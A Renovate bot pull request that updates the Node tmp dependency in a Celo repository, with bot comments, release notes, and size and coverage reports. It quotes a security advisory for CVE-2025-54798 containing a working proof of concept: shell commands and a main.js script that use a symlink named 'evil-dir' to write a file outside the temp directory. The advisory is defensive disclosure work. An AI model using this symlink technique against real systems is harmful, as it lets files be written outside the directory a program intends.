fix(deps): update dependency tmp to ^0.2.0 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
tmp	^0.1.0 -> ^0.2.0

GitHub Vulnerability Alerts

CVE-2025-54798

Summary

tmp@0.2.3 is vulnerable to an Arbitrary temporary file / directory write via symbolic link dir parameter.

Details

According to the documentation there are some conditions that must be held:

// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L41-L50

Other breaking changes, i.e.

- template must be relative to tmpdir
- name must be relative to tmpdir
- dir option must be relative to tmpdir //<-- this assumption can be bypassed using symlinks

are still in place.

In order to override the system's tmpdir, you will have to use the newly
introduced tmpdir option.

// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L375
* `dir`: the optional temporary directory that must be relative to the system's default temporary directory.
     absolute paths are fine as long as they point to a location under the system's default temporary directory.
     Any directories along the so specified path must exist, otherwise a ENOENT error will be thrown upon access, 
     as tmp will not check the availability of the path, nor will it establish the requested path for you.

Related issue: https://github.com/raszi/node-tmp/issues/207.

The issue occurs because _resolvePath does not properly handle symbolic link when resolving paths:

// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L573-L579
function _resolvePath(name, tmpDir) {
  if (name.startsWith(tmpDir)) {
    return path.resolve(name);
  } else {
    return path.resolve(path.join(tmpDir, name));
  }
}

If the dir parameter points to a symlink that resolves to a folder outside the tmpDir, it's possible to bypass the _assertIsRelative check used in _assertAndSanitizeOptions:

// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L590-L609
function _assertIsRelative(name, option, tmpDir) {
  if (option === 'name') {
    // assert that name is not absolute and does not contain a path
    if (path.isAbsolute(name))
      throw new Error(`${option} option must not contain an absolute path, found "${name}".`);
    // must not fail on valid .<name> or ..<name> or similar such constructs
    let basename = path.basename(name);
    if (basename === '..' || basename === '.' || basename !== name)
      throw new Error(`${option} option must not contain a path, found "${name}".`);
  }
  else { // if (option === 'dir' || option === 'template') {
    // assert that dir or template are relative to tmpDir
    if (path.isAbsolute(name) && !name.startsWith(tmpDir)) {
      throw new Error(`${option} option must be relative to "${tmpDir}", found "${name}".`);
    }
    let resolvedPath = _resolvePath(name, tmpDir); //<--- 
    if (!resolvedPath.startsWith(tmpDir))
      throw new Error(`${option} option must be relative to "${tmpDir}", found "${resolvedPath}".`);
  }
}

PoC

The following PoC demonstrates how writing a tmp file on a folder outside the tmpDir is possible.
Tested on a Linux machine.

• Setup: create a symbolic link inside the tmpDir that points to a directory outside of it

mkdir $HOME/mydir1

ln -s $HOME/mydir1 ${TMPDIR:-/tmp}/evil-dir

• check the folder is empty:

ls -lha $HOME/mydir1 | grep "tmp-"

• run the poc

node main.js
File:  /tmp/evil-dir/tmp-26821-Vw87SLRaBIlf
test 1: ENOENT: no such file or directory, open '/tmp/mydir1/tmp-[random-id]'
test 2: dir option must be relative to "/tmp", found "/foo".
test 3: dir option must be relative to "/tmp", found "/home/user/mydir1".

• the temporary file is created under $HOME/mydir1 (outside the tmpDir):

ls -lha $HOME/mydir1 | grep "tmp-"
-rw------- 1 user user    0 Apr  X XX:XX tmp-[random-id]

• main.js

// npm i tmp@0.2.3

const tmp = require('tmp');

const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});
console.log('File: ', tmpobj.name);

try {
    tmp.fileSync({ 'dir': 'mydir1'});
} catch (err) {
    console.log('test 1:', err.message)
}

try {
    tmp.fileSync({ 'dir': '/foo'});
} catch (err) {
    console.log('test 2:', err.message)
}

try {
    const fs = require('node:fs');
    const resolved = fs.realpathSync('/tmp/evil-dir');
    tmp.fileSync({ 'dir': resolved});
} catch (err) {
    console.log('test 3:', err.message)
}

A Potential fix could be to call fs.realpathSync (or similar) that resolves also symbolic links.

function _resolvePath(name, tmpDir) {
  let resolvedPath;
  if (name.startsWith(tmpDir)) {
    resolvedPath = path.resolve(name);
  } else {
    resolvedPath = path.resolve(path.join(tmpDir, name));
  }
  return fs.realpathSync(resolvedPath);
}

Impact

Arbitrary temporary file / directory write via symlink

---

Release Notes

raszi/node-tmp (tmp)

v0.2.4

Compare Source

v0.2.3

Compare Source

v0.2.2

Compare Source

🐛 Bug Fix

• #​278 Closes #​268: Revert "fix #​246: remove any double quotes or single quotes… (@​mbargiel)

📝 Documentation

• #​279 Closes #​266: move paragraph on graceful cleanup to the head of the documentation (@​silkentrance)

Committers: 5

• Carsten Klein (@​silkentrance)
• Dave Nicolson (@​dnicolson)
• KARASZI István (@​raszi)
• Maxime Bargiel (@​mbargiel)
• @​robertoaceves

v0.2.1

Compare Source

🚀 Enhancement

• #​252 Closes #​250: introduce tmpdir option for overriding the system tmp dir (@​silkentrance)

🏠 Internal

• #​253 Closes #​191: generate changelog from pull requests using lerna-changelog (@​silkentrance)

Committers: 1

• Carsten Klein (@​silkentrance)

v0.2.0

Compare Source

🚀 Enhancement

• #​234 feat: stabilize tmp for v0.2.0 release (@​silkentrance)

🐛 Bug Fix

• #​231 Closes #​230: regression after fix for #​197 (@​silkentrance)
• #​220 Closes #​197: return sync callback when using the sync interface, otherwise return the async callback (@​silkentrance)
• #​193 Closes #​192: tmp must not exit the process on its own (@​silkentrance)

📝 Documentation

• #​221 Gh 206 document name option (@​silkentrance)

🏠 Internal

• #​226 Closes #​212: enable direct name option test (@​silkentrance)
• #​225 Closes #​211: existing tests must clean up after themselves (@​silkentrance)
• #​224 Closes #​217: name tests must use tmpName (@​silkentrance)
• #​223 Closes #​214: refactor tests and lib (@​silkentrance)
• #​198 Update dependencies to latest versions (@​matsev)

Committers: 2

• Carsten Klein (@​silkentrance)
• Mattias Severson (@​matsev)

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

---

PR-Codex overview

This PR focuses on updating the tmp dependency from version 0.1.0 to 0.2.0 for security improvements, along with related changes in the yarn.lock file.

Detailed summary

• Updated tmp dependency in packages/dev-utils/package.json from ^0.1.0 to ^0.2.0.
• Updated tmp version in yarn.lock from 0.1.0 to 0.2.0 with new version 0.2.4.
• Removed old tmp version details from yarn.lock.

✨ Ask PR-Codex anything about this PR by commenting with /codex {your question}

[changeset-bot]

🦋 Changeset detected

Latest commit: c84492c

The changes in this PR will be included in the next version bump.

This PR includes changesets to release 1 package

Name	Type
@celo/dev-utils	Patch

Not sure what this means? Click here to learn what changesets are.

Click here if you're a maintainer who wants to add another changeset to this PR

[github-actions]

size-limit report 📦

Path	Size
require('@celo/actions') (cjs)	98.85 KB (0%)
import * from '@celo/actions' (esm)	23.55 KB (0%)
import { resolveAddress } from '@celo/actions' (esm)	23.49 KB (0%)
import { getGasPriceOnCelo } from '@celo/actions' (esm)	73 B (0%)
import * from '@celo/actions/chains' (esm)	329 B (0%)
import { getAccountsContract } from '@celo/actions/contracts/accounts' (esm)	46.11 KB (0%)
import * from '@celo/actions/staking' (esm)	50.66 KB (0%)

[codecov]

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 69.47%. Comparing base (80a7072) to head (c84492c).
⚠️ Report is 1 commits behind head on master.

Additional details and impacted files

@@           Coverage Diff           @@
##           master     #699   +/-   ##
=======================================
  Coverage   69.47%   69.47%           
=======================================
  Files         155      155           
  Lines        7193     7193           
  Branches     1168     1172    +4     
=======================================
  Hits         4997     4997           
+ Misses       2131     2103   -28     
- Partials       65       93   +28     

Components	Coverage Δ
celocli	∅ <ø> (∅)
sdk	69.31% <ø> (ø)
wallets	73.14% <ø> (ø)
viem-sdks	94.15% <ø> (ø)

🚀 New features to boost your workflow:

• ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
• 📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.

[renovate]

Edited/Blocked Notification

Renovate will not automatically rebase this PR, because it does not recognize the last commit author and assumes somebody else may have edited the PR.

You can manually request rebase by checking the rebase/retry box above.

⚠️ Warning: custom changes will be lost.